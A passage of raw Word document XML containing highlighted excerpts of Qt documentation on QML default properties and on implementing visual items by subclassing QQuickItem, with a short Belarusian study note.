          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> messages</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This enables children of a</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MessageBoard</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object to be automatically assigned to its</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messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property if they are not assigned to a specific property. For example:</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MessageBoard</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author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"Naomi"</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author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"Clancy"</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If</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messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>was not set as the default property, then any</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w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects would have to be explicitly assigned to the</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messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property instead, as follows:</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBoard</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    messages</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author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"Naomi"</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Message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author</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Clancy"</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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(Incidentally, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId264" w:anchor="data-prop" w:history="1">
        <w:r w:rsidRPr="00790650">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00790650">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property is its default property</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Any</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId265" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects added to this</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property are also added to the list of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId266" w:anchor="children-prop" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::children</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, so the use of the default property enables visual children to be declared for an item without explicitly assigning them to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId267" w:anchor="children-prop" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>children</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00790650" w:rsidRPr="00790650" w:rsidRDefault="00790650" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>У якасці ўласціасцяў па змоўчанні добра выкарыстоўваць спісы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00FA192B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="316" w:name="defining-visual-items-with-the-qt-quick-"/>
      <w:bookmarkStart w:id="317" w:name="_Toc483000599"/>
      <w:bookmarkStart w:id="318" w:name="_Toc483003616"/>
      <w:bookmarkStart w:id="319" w:name="_Toc483603952"/>
      <w:bookmarkStart w:id="320" w:name="_Toc483605172"/>
      <w:bookmarkEnd w:id="316"/>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Visual Items with the Qt Quick Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
      <w:bookmarkEnd w:id="318"/>
      <w:bookmarkEnd w:id="319"/>
      <w:bookmarkEnd w:id="320"/>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When building user interfaces with the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId268" w:history="1">
        <w:r w:rsidRPr="00C34F7E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">module, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all QML objects that are to be visually rendered must derive from the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId269" w:history="1">
        <w:r w:rsidRPr="00C34F7E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as it is the base type for all visual objects in</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId270" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId271" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type is implemented by the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId272" w:history="1">
        <w:r w:rsidRPr="00C34F7E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++ class, which is provided by the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId273" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">module. Therefore, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this class should be subclassed</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when it is necessary to implement a visual type in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be integrated into a QML-based user interface.</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See the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId274" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation for more information. Additionally, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId275" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Writing QML Extensions with C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tutorial demonstrates how a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId276" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-based visual item can be implemented in C++ and integrated into a Qt Quick-based user interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00B307B1" w:rsidRDefault="00DA77C2" w:rsidP="00FA192B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="321" w:name="receiving-notifications-for-object-initi"/>
      <w:bookmarkStart w:id="322" w:name="_Toc483000600"/>
      <w:bookmarkStart w:id="323" w:name="_Toc483003617"/>
      <w:bookmarkStart w:id="324" w:name="_Toc483603953"/>
      <w:bookmarkStart w:id="325" w:name="_Toc483605173"/>
      <w:bookmarkEnd w:id="321"/>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
